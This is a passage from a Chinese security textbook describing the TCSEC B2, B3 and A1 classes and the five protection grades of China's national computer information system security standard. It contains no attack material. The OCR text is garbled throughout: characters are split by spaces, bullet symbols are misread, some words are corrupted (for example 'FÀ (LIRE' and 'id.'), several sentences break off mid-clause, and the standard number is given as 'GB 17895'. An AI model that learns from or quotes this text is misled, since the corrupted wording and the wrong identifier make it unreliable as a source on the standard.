B2 系统 必须 满足 Bl 系统 的 所 有 要 求 。 另 外 ,B2 系统 的 管理 员 必 须 使 用 一 个 明确 的 、 
文档 化 的 安全 策略 模式 作为 系统 的 可 信任 运算 基础 体制 。B2 系统 必须 满足 下 列 要 求 : 系 
统 必 须 立 即 通知 系统 中 的 每 一 个 用 户 所 有 与 之 相关 的 网 络 连接 的 改变 ; 只 有 用 户 能 够 在 可 
信任 通信 路 径 中 进行 初始 化 通信 ; 可 信任 运算 基础 体制 能 够 支持 独立 的 操作 者 和 管理 员 。 

B3 系统 必须 符合 B2 系统 的 所 有 安全 需求 。B3 系统 具有 很 强 的 监视 委托 管理 访问 能 
力 和 抗 干 扰 能 力 。B3 系统 必须 设 有 安全 管理 员 。B3 系统 应 满足 以 下 要 求 : 除了 控制 对 个 
别 对 象 的 访问 外 ,B3 必须 产生 一 个 可 读 的 安全 列表 ; 每 个 被 命名 的 对 象 提供 对 该 对 象 没有 
访问 权 的 用 户 列 表 说 明 ; B3 系统 在 进行 任何 操作 前 ,要 求 用 户 进 行 身份 验证 ; B3 系统 验证 
每 个 用 户 , 同 时 还 会 发 送 一 个 取消 访问 的 审计 跟踪 消息 ; 设计 者 必须 正确 区 分 可 信任 的 通 
信 路 径 和 其 他 路 径 ; 可 信任 的 通信 基础 体制 为 每 一 个 被 命名 的 对 象 建立 安全 审计 跟踪 ; 可 
信任 的 运算 基础 体制 支持 独立 的 安全 管理 。 

人 A 类 安全 等 级 : A 系统 的 安全 级 别 最 高 。 目 前 ,A 类 安全 等 级 只 包含 Al 一 个 安全 类 
别 。Al 类 与 B3 类 相似 ,对 系统 的 结构 和 策略 不 作 特别 要 求 。A1l 系统 的 显著 特征 是 ,系统 
的 设计 者 必须 按照 一 个 正式 的 设计 规范 来 分 析 系 统 。 对 系统 分 析 后 ,设计 者 必须 运用 核对 
技术 来 确保 系统 符合 设计 规范 。Al 系统 必须 满足 下 列 要 求 : 系统 管理 员 必须 从 开发 者 那 
里 接收 到 一 个 安全 策略 的 正式 模型 ; 所 有 的 安装 操作 都 必须 由 系统 管理 员 进 行 ; 系统 管理 
员 进 行 的 每 一 步 安装 操作 都 必须 有 正式 文档 。 


4.7.3 中 国 国家 标准 (计算 机 信息 安全 保护 等 级 划分 准则 》 


中 国 公安 部 主持 制定 \ 国 家 技术 标准 局 发 布 的 中 华人 民 共 和 国 国家 标准 GB 17895 一 
1999《 计 算 机 信息 系统 安全 保护 等 级 划分 准则 》 于 2001 年 1 月 1 日 起 实施 。 该 准则 将 信息 
系统 安全 分 为 5 个 等 级 ,分 别 是 自主 保护 级 、 系 统 审 计 保 护 级 、 安 全 标记 保护 级 、 结 构 化 保护 
级 和 访问 验证 保护 级 。 主 要 的 安全 考核 指标 有 身份 认证 、 自 主 访问 控制 数据 完整 性 、 审 计 、 
隐蔽 信道 分 析 、 客 体重 用 、 强 制 访问 控制 ,安全 标记 、 可 信和 路 径 和 可 信人 恢复 等 ,这 些 指标 涵盖 
了 不 同 级 别 的 安全 要 求 。 内 容 如 下 。 

1. 范围 

本 标准 规定 了 计算 机 系统 安全 保护 能 力 的 五 个 等 级 。 

第 一 级 : 用 户 自主 保护 级 ; 

第 二 级 : 系统 审计 保护 级 ; 

第 三 级 : 安全 标记 保护 级 ; 

第 四 级 : 结构 化 保护 级 ; 

第 五 级 : 访问 验证 保护 级 。 
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本 标准 适用 计算 机 信息 系统 安全 保护 技术 能 力 等 级 的 划分 。 计 算 机 信息 系统 安全 保护 
能 力 随 着 安全 保护 等 级 的 增高 ,逐渐 增强 o 

2. 引用 标准 

下 列 标准 所 包含 的 条 文 ,通过 在 本 标准 中 引用 而 构成 为 本 标准 的 条 文 。 本 标准 出 版 时 ， 
所 示 版 本 均 为 有 效 。 所 有 标准 都 会 被 修订 .使 用 本 标准 的 各 方 应 探讨 使 用 下 列 标准 最 新 版 
本 的 可 能 性 。 

3. 定义 

除 本 章 定义 外 ,其 他 未 列 出 的 定义 见 GB/T 5271。 

CD 计算 机 信息 系统 (computer information system) 

计算 机 信息 系统 是 由 计算 机 及 其 相关 的 和 配套 的 设备 、 设 施 ( 含 网 络 ) 构 成 的 ,按照 一 定 
的 应 用 目标 和 规则 对 信息 进行 采集 、 加 工 、 存 储 、 传 输 、 检 索 等 处 理 的 人 机 系统 。 

(2) 计算 机 信息 系统 可 信 计 算 基 (trusted computing base of computer information 
system) 

计算 机 系统 内 保护 装置 的 总 体 , 包 括 硬 件 、 固 件 . 软 件 和 负责 执行 安全 策略 的 组 合体 。 
它 建立 了 一 个 基本 的 保护 环境 并 提供 一 个 可 信 计 算 系 统 所 要 求 的 附加 用 户 服务 。 

(3) 客体 (object) 

客体 是 指 信息 的 载体 。 

(4) 主体 (subject) 
主体 是 指引 起 信息 在 客体 之 间 流 动 的 人 、 进 程 或 设备 等 。 

(5) 敏感 标记 (sensitivity label) 

敏感 标记 表示 客体 安全 级 别 并 描述 客体 数据 敏感 性 的 一 组 信息 ,可 信 计 算 基 中 把 敏感 
标记 作为 强制 访问 控制 决策 的 依据 。 

(6) 安全 策略 (security policy) 

安全 策略 指 有 关 管 理 、 保 护 和 发 布 敏感 信息 的 法 律 .规定 和 实施 细则 。 

(7) 信道 Cchannel) 

信道 指 系统 内 的 信息 传输 路 径 。 

(8) 隐蔽 信道 (covert channel) 

隐蔽 信道 指 允 许 进程 以 危害 系统 安全 策略 的 方式 传输 信息 的 通信 信道 。 

(9) 访问 监控 器 (reference monitor) 

访问 监控 器 指 监控 主体 和 客体 之 间 授 权 访问 关系 的 部 件 。 

4. 等 级 划分 准则 

(1) 第 一 级 : 用 户 自主 保护 级 

本 级 的 计算 机 信息 系统 可 信 计 算 基 通过 隔离 用 户 与 数据 ,使 用 户 具 备 自主 安全 保护 的 
能 力 。 它 具有 多 种 形式 的 控制 能 力 , 对 用 户 实施 访问 控制 , 即 为 用 户 提供 可 行 的 手段 ,保护 
用 户 和 用 户 组 信息 ,避免 其 他 用 户 对 数据 的 非法 读 写 与 破坏 。 

O 自主 访问 控制 。 计 算 机 信息 系统 可 信 计 算 基 定义 和 控制 系统 中 命名 用 户 对 命名 客 
体 的 访问 。 实 施 机 制 ( 例 如 : 访问 控制 表 ) 允 许 命名 用 户 以 用 户 和 (或 ) 用 户 组 的 身份 规定 并 
控制 客体 的 共享 ; 阻止 非 授权 用 户 读 取 敏感 信息 。 

O 身份 鉴别 。 计 算 机 信息 系统 可 信 计 算 基 初始 执行 时 ,首先 要 求 用 户 标识 自己 的 身 
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份 , 并 使 用 保护 机 制 ( 例 如 : 口令 ) 来 鉴别 用 户 的 身份 ,阻止 非 授 权 用 户 访问 用 户 身 份 鉴别 
数据 。 

@ 数据 完整 性 。 计 算 机 信息 系统 可 信 计 算 基 通过 自主 完整 性 策略 ,阻止 非 授 权 用 户 修 
改 或 破坏 敏感 信息 。 

(2) 第 二 级 : 系统 审计 保护 级 

与 用 户 自主 保护 级 相 比 , 本 级 的 计算 机 信息 系统 可 信 计 算 基 实施 了 粒度 更 细 的 自主 访 
问 控制 , 它 通 过 登录 规程 .审计 安全 性 相关 事件 和 隔离 资源 ,使 用 户 对 自己 的 行为 负责 。 

O 自主 访问 控制 。 计 算 机 信息 系统 可 信 计 算 基 定义 和 控制 系统 中 命名 用 户 对 命名 客 
体 的 访问 。 实 施 机 制 ( 例 如 : 访问 控制 表 ) 允 许 命名 用 户 以 用 户 和 (或 ) 用 户 组 的 身份 规定 并 
控制 客体 的 共享 ; 阻止 非 授 权 用 户 读 取 敏感 信息 。 并 控制 访问 权限 扩散 。 自 主 访问 控制 机 
制 根据 用 户 指 定 方式 或 默认 方式 ,阻止 非 授 权 用 户 访问 客体 。 访 问 控 制 的 粒度 是 单个 用 户 。 
没有 存 取 权 的 用 户 只 允许 由 授权 用 户 指定 对 客体 的 访问 权 。 

@ 身份 鉴别 。 计 算 机 信息 系统 可 信 计 算 基 初始 执行 时 ,首先 要 求 用 户 标识 自己 的 身 
份 ,并 使 用 保护 机 制 ( 例 如 : 口令 ) 来 鉴别 用 户 的 身份 ; 阻止 非 授权 用 户 访 问 用 户 身份 鉴别 
数据 。 通 过 为 用 户 提供 唯一 标识 、 计 算 机 信息 系统 可 信 计 算 基 能 够 使 用 户 对 自己 的 行为 负 
责 。 计 算 机 信息 系统 可 信 计 算 基 还 具备 将 身份 标识 与 该 用 户 所 有 可 审计 行为 相关 联 的 
能 力 。 

C 客体 重用 。 在 计算 机 信息 系统 可 信 计 算 基 的 空闲 存储 客体 空间 中 ,对 客体 初始 指 
定 、 分 配 或 再 分 配 一 个 主体 之 前 ,撤销 该 客体 所 含 信 息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 
释放 的 客体 的 访问 权时 ,当前 主体 不 能 获得 原 主体 活动 所 产生 的 任何 信息 。 

@ 审计 。 计 算 机 信息 系统 可 信 计 算 基 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 e 
并 能 阻止 非 授 权 的 用 户 对 它 访问 或 破坏 。 

计算 机 信息 系统 可 信 计 算 基 能 记录 下 述 事件 : 使 用 身份 鉴别 机 制 ; 将 客体 引入 用 户 地 
址 空间 (例如 : 打开 文件 程序 初始 化 ); 删除 客体 ; 由 操作 员 、 系 统管 理 员 或 (和 ) 系 统 安全 
管理 员 实 施 的 动作 ,以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ,其 审计 记录 包括 : 事 
件 的 日 期 和 时 间 、 用 户 、 事 件 类 型 .事件 是 否 成 功 。 对 于 身份 鉴别 事件 .审计 记录 包含 的 来 源 
(例如 : 终端 标识 符 ); 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 事件 ,审计 记录 包含 
客体 名 。 

对 不 能 由 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 事件 .审计 机 制 提供 审计 记录 接 
口 , 可 巾 授权 主体 调用 。 这 些 审计 记录 区 别 于 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 
id. 

C 数据 完整 性 。 计 算 机 信息 系统 可 信 计 算 基 通过 自主 完整 性 策略 ,阻止 非 授 权 用 户 修 
改 或 破坏 敏感 信息 。 

(3) 第 三 级 : 安全 标记 保护 级 

本 级 的 计算 机 信息 系统 可 信 计 算 基 具有 系统 审计 保护 级 所 有 功能 。 此 外 ,还 提供 有 关 
安全 策略 模型 .数据 标记 以 及 主体 对 客体 强制 访问 控制 的 非 形 式 化 描述 ; 具有 准确 地 标记 
输出 信息 的 能 力 ; 消除 通过 测试 发 现 的 任何 错误 。 

O 自主 访问 控制 。 计 算 机 信息 系统 可 信 计 算 基 定义 和 控制 系统 中 命名 用 户 对 命名 客 
体 的 访问 。 实 施 机 制 ( 例 如 : 访问 控制 表 ) 允 许 命名 用 户 以 用 户 和 (或 ) 用 户 组 的 身份 规定 并 
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控制 客体 的 共享 ; 阻止 非 授权 用 户 读 取 敏感 信息 。 并 控制 访问 权限 扩散 。 自 主 访问 控制 机 
制 根据 用 户 指定 方式 或 默认 方式 ,阻止 非 授权 用 户 访问 客体 。 访 问 控制 的 粒度 是 单个 用 户 。 
没有 存 取 权 的 用 户 只 允许 由 授权 用 户 指定 对 客体 的 访问 权 。 阻 止 非 授权 用 户 读 取 人 敏感 
信息 。 

Q 强制 访问 控制 。 计 算 机 信息 系统 可 信 计 算 基 对 所 有 主体 及 其 所 控制 的 客体 (例如 : 
进程 文件. 段 . 设 备 ) 实 施 强制 访问 控制 。 为 这 些 主体 及 客体 指定 敏感 标记 ,这 些 标记 是 等 
级 分 类 和 非 等 级 类 别 的 组 合 ,它们 是 实施 强制 访问 控制 的 依据 。 计算机 信息 系统 可 信 计 算 
基 支 持 两 种 或 两 种 以 上 成 分 组 成 的 安全 级 。 计 算 机 信息 系统 可 信 计 算 基 控制 的 所 有 主体 对 
客体 的 访问 应 满足 : 仅 当 主体 安全 级 中 的 等 级 分 类 高 于 或 等 于 客体 安全 级 中 的 等 级 分 类 ， 
且 主 体 安全 级 中 的 非 等 级 类 别 包 含 了 客体 安全 级 中 的 全 部 非 等 级 类 别 , 主 体 才能 读 客体 ， 
仅 当 主体 安全 级 中 的 等 级 分 类 低 于 或 等 于 客体 安全 级 中 的 等 级 分 类 , 且 主 体 安 全 级 中 的 非 
等 级 类 别 包含 于 客体 安全 级 中 的 非 等 级 类 别 ,主体 才能 写 一 个 客体 。 计 算 机 信息 系统 可 信 
计算 基 使 用 身份 和 鉴别 数据 ,鉴别 用 户 的 身份 ,并 保证 用 户 创建 的 计算 机 信息 系统 可 信 计 算 
基 外 部 主体 的 安全 级 和 授权 受 该 用 户 的 安全 级 和 授权 的 控制 。 

© 标记 。 计 算 机 信息 系统 可 信 计 算 基 应 维护 与 主体 及 其 控制 的 存储 客体 (例如 : 进 
程 . 文 件 、 段 ,设备 ) 相 关 的 敏感 标记 。 这 些 标记 是 实施 强制 访问 的 基础 。 为 了 输入 未 加 安全 
标记 的 数据 ,计算 机 信息 系统 可 信 计 算 基 向 授权 用 户 要 求 并 接受 这 些 数据 的 安全 级 别 , 且 可 
由 计算 机 信息 系统 可 信 计 算 基 审计 。 

@ 身份 鉴别 。 计 算 机 信息 系统 可 信 计 算 基 初始 执行 时 ,首先 要 求 用 户 标 识 自 己 的 身 
份 ,而 且 ,计算 机 信息 系统 可 信 计 算 基 维护 用 户 身份 识别 数据 并 确定 用 户 访问 权 及 授权 数 
据 。 计 算 机 信息 系统 可 信 计 算 基 使 用 这 些 数据 鉴别 用 户 身份 ,并 使 用 保护 机 制 (例如 : 口 
令 ) 来 鉴别 用 户 的 身份 ; 阻止 非 授权 用 户 访问 用 户 身份 鉴别 数据 。 通 过 为 用 户 提 供 唯一 标 
识 , 计 算 机 信息 系统 可 信 计 算 基 能 够 使 用 户 对 自己 的 行为 负责 。 计 算 机 信息 系统 可 信 计 算 
基 还 具备 将 身份 标识 与 该 用 户 所 有 可 审计 行为 相关 联 的 能 力 。 

© 客体 重用 。 在 计算 机 信息 系统 可 信 计 算 基 的 空闲 存储 客体 空间 中 ,对 客体 初始 指 
定 、 分 配 或 再 分 配 一 个 主体 之 前 ,撤销 客体 所 含 信息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 释 
放 的 客体 的 访问 权时 ,当前 主体 不 能 获得 原 主体 活动 所 产生 的 任何 信息 。 

© 审计 。 计 算 机 信息 系统 可 信 计 算 基 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ， 
并 能 阻止 非 授权 的 用 户 对 它 访问 或 破坏 。 

计算 机 信息 系统 可 信 计 算 基 能 记录 下 述 事 件 : 使 用 身份 鉴别 机 制 ; 将 客体 引入 用 户 地 
址 空间 (例如 : 打开 文件 ` 程 序 初 始 化 ); 删除 客体 ; 由 操作 员 、 系 统管 理 员 或 (和 ) 系 统 安 全 
管理 员 实施 的 动作 ,以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ,其 审计 记录 包括 事件 
的 日 期 和 时 间 、 用 户 、 事 件 类 型 .事件 是 否 成 功 。 对 于 身份 鉴别 事件 ,审计 记录 包含 请 求 的 来 
源 (例如 : 终端 标识 符 ); 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 事件 ,审计 记录 包 
含 客体 名 及 客体 的 安全 级 别 。 此 外 ,计算 机 信息 系统 可 信 计 算 基 具有 审计 更 改 可 读 输 出 记 
号 的 能 力 。 

对 不 能 由 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 事件 ,审计 机 制 提供 审计 记录 接 
口 ,可 由 授权 主体 调用 。 这 些 审计 记录 区 别 于 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 
记录 。 
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CD 数据 完整 性 。 计 算 机 信息 系统 可 信 计 算 基 通过 自主 和 强制 完整 性 策略 ,阻止 非 授 权 
用 户 修 改 或 破坏 敏感 信息 。 在 网 络 环境 中 ,使 用 完整 性 敏感 标记 来 确信 信息 在 传送 中 未 

(4) 第 四 级 : 结构 化 保护 级 

本 级 的 计算 机 信息 系统 可 信 计 算 基 建立 于 一 个 明确 定义 的 形式 化 安全 策略 模型 之 上 ， 
它 要 求 将 第 三 级 系统 中 的 自主 和 强制 访问 控制 扩展 到 所 有 主体 与 客体 。 此 外 ,还 要 考虑 隐 
项 通道 。 本 级 的 计算 机 信息 系统 可 信 计 算 基 必须 结构 化 为 关键 保护 元 素 和 非 关 键 保 护 元 
素 。 计 算 机 信息 系统 可 信 计 算 基 的 接口 也 必须 明确 定义 ,使 其 设计 与 实现 能 经 受 更 充分 的 
测试 和 更 完整 的 复审 。 加 强 了 鉴别 机 制 ; 支持 系统 管理 员 和 操作 员 的 职能 ; 提供 可 信 设 施 
管理 ; 增强 了 配置 管理 控制 。 系 统 具 有 相当 的 抗 渗透 能 力 。 

O 自主 访问 控制 。 计 算 机 信息 系统 可 信 计 算 基 定义 和 控制 系统 中 命名 用 户 对 命名 客 
体 的 访问 。 实 施 机 制 (例如 : 访问 控制 表 ) 人 允许 命名 用 户 和 (或 ) 以 用 户 组 的 身份 规定 并 控制 
客体 的 共享 ; 阻止 非 授 权 用 户 读 取 敏感 信息 。 并 控制 访问 权限 扩散 。 

自主 访问 控制 机 制 根 据 用 户 指 定 方式 或 默认 方式 ,阻止 非 授 权 用 户 访 问 客体 。 访问 控 
制 的 粒度 是 单个 用 户 。 没 有 存 取 权 的 用 户 只 允许 由 授权 用 户 指定 对 客体 的 访问 权 。 

© 强制 访问 控制 。 计 算 机 信息 系统 可 信 计 算 基 对 外 部 主体 能 够 直接 或 间接 访问 的 所 
有 资源 (例如 : 主体 、 存 储 客体 和 输入 输出 资源 ) 实 施 强制 访问 控制 。 为 这 些 主体 及 客体 指 
定 敏 感 标记 ,这 些 标 记 是 等 级 分 类 和 非 等 级 类 别 的 组 合 ,它们 是 实施 强制 访问 控制 的 依据 。 
计算 机 信息 系统 可 信 计 算 基 支持 两 种 或 两 种 以 上 成 分 组 成 的 安全 级 。 计 算 机 信息 系统 可 信 
计算 基 外 部 的 所 有 主体 对 客体 的 直接 或 间接 的 访问 应 满足 : 仅 当 主体 安全 级 中 的 等 级 分 类 
高 于 或 等 于 客体 安全 级 中 的 等 级 分 类 , 且 主 体 安全 级 中 的 非 等 级 类 别 包 含 了 客体 安全 级 中 
的 全 部 非 等 级 类 别 ,主体 才能 读 客体 ; 仅 当 主体 安全 级 中 的 等 级 分 类 低 于 或 等 于 客体 安全 
级 中 的 等 级 分 类 , 且 主 体 安 全 级 中 的 非 等 级 类 别 包含 于 客体 安全 级 中 的 非 等 级 类 别 ,主体 才 
能 写 一 个 客体 。 计 算 机 信息 系统 可 信 计 算 基 使 用 身份 和 鉴别 数据 ,鉴别 用 户 的 身份 ,保护 用 
户 创建 的 计算 机 信息 系统 可 信 计 算 基 外 部 主体 的 安全 级 和 授权 受 该 用 户 的 安全 级 和 授权 的 
控制 。 

© 标记 。 计 算 机 信息 系统 可 信 计 算 基 维护 与 可 被 外 部 主体 直接 或 间接 访问 到 的 计算 
机 信息 系统 资源 (例如 : 主体 ,存储 客体 .只 读 存 储 器 ) 相 关 的 敏感 标记 。 这 些 标记 是 实施 强 
制 访问 的 基础 。 为 了 输入 未 加 安全 标记 的 数据 ,计算 机 信息 系统 可 信 计 算 基 向 授权 用 户 要 
求 并 接受 这 些 数 据 的 安全 级 别 , 且 可 由 计算 机 信息 系统 可 信 计 算 基 审计 。 

@ 身份 鉴别 。 计 算 机 信息 系统 可 信 计 算 基 初始 执行 时 ,首先 要 求 用 户 标识 自己 的 身 
份 ,而 且 , 计 算 机 信息 系统 可 信 计 算 基 维护 用 户 身份 识别 数据 并 确定 用 户 访问 权 及 授权 数 
据 。 计 算 机 信息 系统 可 信 计 算 基 使 用 这 些 数据 ,鉴别 用 户 身 份 ,并 使 用 保护 机 制 (例如 : 口 
令 ) 来 鉴别 用 户 的 身份 ; 阻止 非 授权 用 户 访问 用 户 身份 鉴别 数据 。 通 过 为 用 户 提 供 唯一 标 
识 , 计 算 机 信息 系统 可 信 计 算 基 能 够 使 用 户 对 自己 的 行为 负责 。 计 算 机 信息 系统 可 信 计 算 
基 还 具备 将 身份 标识 与 该 用 户 所 有 可 审计 行为 相关 联 的 能 力 。 

C 客体 重用 。 在 计算 机 信息 系统 可 信 计 算 基 的 空闲 存储 客体 空间 中 ,对 客体 初始 指 
定 、 分 配 或 再 分 配 一 个 主体 之 前 ,撤销 客体 所 含 信息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 释 
放 的 客体 的 访问 权时 ,当前 主体 不 能 获得 原 主 体 活动 所 产生 的 任何 信息 。 
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© 审计 。 计 算 机 信息 系统 可 信 计 算 基 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ， 
并 能 阻止 非 授 权 的 用 户 对 它 访 问 或 破坏 。 

计算 机 信息 系统 可 信 计 算 基 能 记录 下 述 事件 : 使 用 身份 鉴别 机 制 ; 将 客体 引入 用 户 地 
址 空间 (例如 : 打开 文件 、 程 序 初始 化 ); 删除 客体 ; 由 操作 员 、 系 统管 理 员 或 (和 ) 系 统 安全 
管理 员 实施 的 动作 ,以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ,其 审计 记录 包括 事件 
的 日 期 和 时 间 用户 .事件 类 型 .事件 是 否 成 功 。 对 于 身份 鉴别 事件 ,审计 记录 包含 请 求 的 来 
源 ( 例 如 : 终端 标识 符 ); 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 事件 ,审计 记录 包 
含 客体 及 客体 的 安全 级 别 。 此 外 ,计算 机 信息 系统 可 信 计 算 基 具有 审计 更 改 可 读 输 出 记号 
的 能 力 。 

对 不 能 由 计算 机 信息 系统 可 信 计 算 基 独 立 分 辨 的 审计 事件 ,审计 机 制 提供 审计 记录 接 
口 , 可 由 授权 主体 调用 。 这 些 审计 记录 区 别 于 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 
记录 。 

计算 机 信息 系统 可 信 计 算 基 能 够 审计 利用 隐蔽 存储 信道 时 可 能 被 使 用 的 事件 。 

CD 数据 完整 性 。 计 算 机 信息 系统 可 信 计 算 基 通过 自主 和 强制 完整 性 策略 。 阻 止 非 授 
权 用 户 修改 或 破坏 敏感 信息 。 在 网 络 环境 中 ,使 用 完整 性 敏感 标记 来 确信 信息 在 传送 中 未 

® 隐蔽 信道 分 析 。 系 统 开 发 者 应 彻底 搜索 隐蔽 存储 信道 ,并 根据 实际 测量 或 工程 估算 
确定 每 一 个 被 标识 信道 的 最 大 带宽 。 

© 可 信 路 径 。 对 用 户 的 初始 登录 和 鉴别 ,计算 机 信息 系统 可 信 计 算 基 在 它 与 用 户 之 间 
提供 可 信 通 信 路 径 。 该 路 径 上 的 通信 只 能 由 该 用 户 初始 化 。 

(5) 第 五 级 : 访问 验证 保护 级 

本 级 的 计算 机 信息 系统 可 信 计 算 基 满足 访问 监控 器 需求 。 访 问 监控 器 仲裁 主体 对 客体 
的 全 部 访问 。 访 问 监控 器 本 身 是 抗 自 改 的 ; 必须 足够 小 ,能 够 分 析 和 测试 。 为 了 满足 访问 
监控 器 需求 ,计算 机 信息 系统 可 信 计 算 基 在 其 构造 时 ,排除 那些 对 实施 安全 策略 来 说 并 非 必 
要 的 代码 ; 在 设计 和 实现 时 ,从 系统 工程 角度 将 其 复杂 性 降低 到 最 低 程度 。 支 持 安全 管理 
员 职 能 ; 扩充 审计 机 制 , 当 发 生 与 安全 相关 的 事件 时 发 出 信号 ; 提供 系统 恢复 机 制 。 系 统 
具有 很 高 的 抗 渗透 能 力 。 

O 自主 访问 控制 。 计 算 机 信息 系统 可 信 计 算 基 定义 并 控制 系统 中 命名 用 户 对 命名 客 
体 的 访问 。 实 施 机 制 (例如 : 访问 控制 表 ) 允 许 命名 用 户 和 (或 ) 以 用 户 组 的 身份 规定 并 控制 
客体 的 共享 ; 阻止 非 授 权 用 户 读 取 敏感 信息 。 并 控制 访问 权限 扩散 。 

自主 访问 控制 机 制 根据 用 户 指定 方式 或 默认 方式 ,阻止 非 授 权 用 户 访问 客体 。 访 问 控 
制 的 粒度 是 单个 用 户 。 访 问 控制 能 够 为 每 个 命名 客体 指定 命名 用 户 和 用 户 组 ,并 规定 他 们 
对 客体 的 访问 模式 。 没 有 存 取 权 的 用 户 只 允许 由 授权 用 户 指定 对 客体 的 访问 权 。 

© 强制 访问 控制 。 计 算 机 信息 系统 可 信 计 算 基 对 外 部 主体 能 够 直接 或 间接 访问 的 所 
有 资源 (例如 : 主体 .存储 客体 和 输入 输出 资源 ) 实 施 强制 访问 控制 。 为 这 些 主体 及 客体 指 
定 敏 感 标记 ,这 些 标记 是 等 级 分 类 和 非 等 级 类 别 的 组 合 .它们 是 实施 强制 访问 控制 的 依据 。 
计算 机 信息 系统 可 信 计 算 基 支持 两 种 或 两 种 以 上 成 分 组 成 的 安全 级 。 计 算 机 信息 系统 可 信 
计算 基 外 部 的 所 有 主体 对 客体 的 直接 或 间接 的 访问 应 满足 : 仅 当 主体 安全 级 中 的 等 级 分 类 
高 于 或 等 于 客体 安全 级 中 的 等 级 分 类 ,上 且 主 体 安全 级 中 的 非 等 级 类 别 包含 了 客体 安全 级 中 
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的 全 部 非 等 级 类 别 ,主体 才能 读 客 体 ; 仅 当 主体 安全 级 中 的 等 级 分 类 低 于 或 等 于 客体 安全 
级 中 的 等 级 分 类 , 且 主 体 安 全 级 中 的 非 等 级 类 别 包 含 于 客体 安全 级 中 的 非 等 级 类 别 , 主 体 才 
能 写 一 个 客体 。 计 算 机 信息 系统 可 信 计 算 基 使 用 身份 和 鉴别 数据 ,鉴别 用 户 的 身份 ,保证 用 
户 创建 的 计算 机 信息 系统 可 信 计 算 基 外 部 主体 的 安全 级 和 授权 受 该 用 户 的 安全 级 和 授权 的 
控制 。 

© 标记 。 计 算 机 信息 系统 可 信 计 算 基 维护 与 可 被 外 部 主体 直接 或 间接 访问 到 计算 机 
信息 系统 资源 (例如 : 主体 存储 客体 .只 读 存 储 器 ) 相 关 的 敏感 标记 。 这 些 标记 是 实施 强制 
访问 的 基础 。 为 了 输入 未 加 安全 标记 的 数据 ,计算 机 信息 系统 可 信 计 算 基 向 授权 用 户 要 求 
并 接受 这 些 数据 的 安全 级 别 , 且 可 由 计算 机 信息 系统 可 信 计 算 基 审计 。 

@ 身份 鉴别 。 计 算 机 信息 系统 可 信 计 算 基 初始 执行 时 ,首先 要 求 用 户 标 识 自 己 的 身 
份 ,而 且 ,计算 机 信息 系统 可 信 计 算 基 维护 用 户 身份 识别 数据 并 确定 用 户 访问 权 及 授权 数 
据 。 计 算 机 信息 系统 可 信 计 算 基 使 用 这 些 数据 ,鉴别 用 户 身 份 ,并 使 用 保护 机 制 ( 例 如 : 口 
令 ) 来 鉴别 用 户 的 身份 ; 阻止 非 授权 用 户 访 问 用 户 身 份 鉴别 数据 。 通 过 为 用 户 提供 唯一 标 
识 , 计 算 机 信息 系统 可 信 计 算 基 能 够 使 用 户 对 自己 的 行为 负责 。 计 算 机 信息 系统 可 信 计 算 
基 还 具备 将 身份 标识 与 该 用 户 所 有 可 审计 行为 相关 联 的 能 力 。 

C) 客体 重用 。 在 计算 机 信息 系统 可 信 计 算 基 的 空闲 存储 客体 空间 中 ,对 客体 初始 指 
定 、 分 配 或 再 分 配 一 个 主体 之 前 ,撤销 客体 所 含 信息 的 所 有 授权 。 当 主体 获得 对 一 个 已 被 释 
放 的 客体 的 访问 权时 ,当前 主体 不 能 获得 原 主体 活动 所 产生 的 任何 信息 。 

© 审计 。 计 算 机 信息 系统 可 信 计 算 基 能 创建 和 维护 受 保护 客体 的 访问 审计 跟踪 记录 ， 
并 能 阻止 非 授 权 的 用 户 对 它 访 问 或 破坏 。 

计算 机 信息 系统 可 信 计 算 基 能 记录 下 述 事件 : 使 用 身份 鉴别 机 制 ; 将 客体 引入 用 户 地 
址 空间 (例如 : 打开 文件 ,程序 初始 化 ); 删除 客体 ; 由 操作 员 、 系 统管 理 员 或 (和 ) 系 统 安全 
管理 员 实 施 的 动作 ,以 及 其 他 与 系统 安全 有 关 的 事件 。 对 于 每 一 事件 ,其 审计 记录 包括 事件 
的 日 期 和 时 间 、 用 户 、 事 件 类 型 .事件 是 否 成 功 。 对 于 身份 鉴别 事件 ,审计 记录 包含 请 求 的 来 
源 ( 例 如 : 终端 标识 符 ); 对 于 客体 引入 用 户 地 址 空间 的 事件 及 客体 删除 事件 ,审计 记录 包 
含 客 体 名 及 客体 的 安全 级 别 。 此 外 ,计算 机 信息 系统 可 信 计 算 基 具有 审计 更 改 可 读 输 出 记 
号 的 能 力 。 

对 不 能 由 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 事件 ,审计 机 制 提供 审计 记录 接 
口 ,可 由 授权 主体 调用 。 这 些 审计 记录 区 别 于 计算 机 信息 系统 可 信 计 算 基 独立 分 辨 的 审计 
记录 。 计 算 机 信息 系统 可 信 计 算 基 能 够 审计 利用 隐蔽 存储 信道 时 可 能 被 使 用 的 事件 。 

计算 机 信息 系统 可 信 计 算 基 包含 能 够 监控 可 审计 安全 事件 发 生 与 积累 的 机 制 , 当 超过 
FÀ (LIRE ,能 够 立即 向 安全 管理 员 发 出 报警 。 并 且 , 如 果 这 些 与 安全 相关 的 事件 继续 发 生 或 积 
累 ,系统 应 以 最 小 的 代价 中 止 它们 。 

D 数据 完整 性 。 计 算 机 信息 系统 可 信 计 算 基 通 过 自主 和 强制 完整 性 策略 ,阻止 非 授权 
用 户 修改 或 破坏 敏感 信息 。 在 网 络 环境 中 ,使 用 完整 性 敏感 标记 来 确信 信息 在 传送 中 未 
受 损 。 

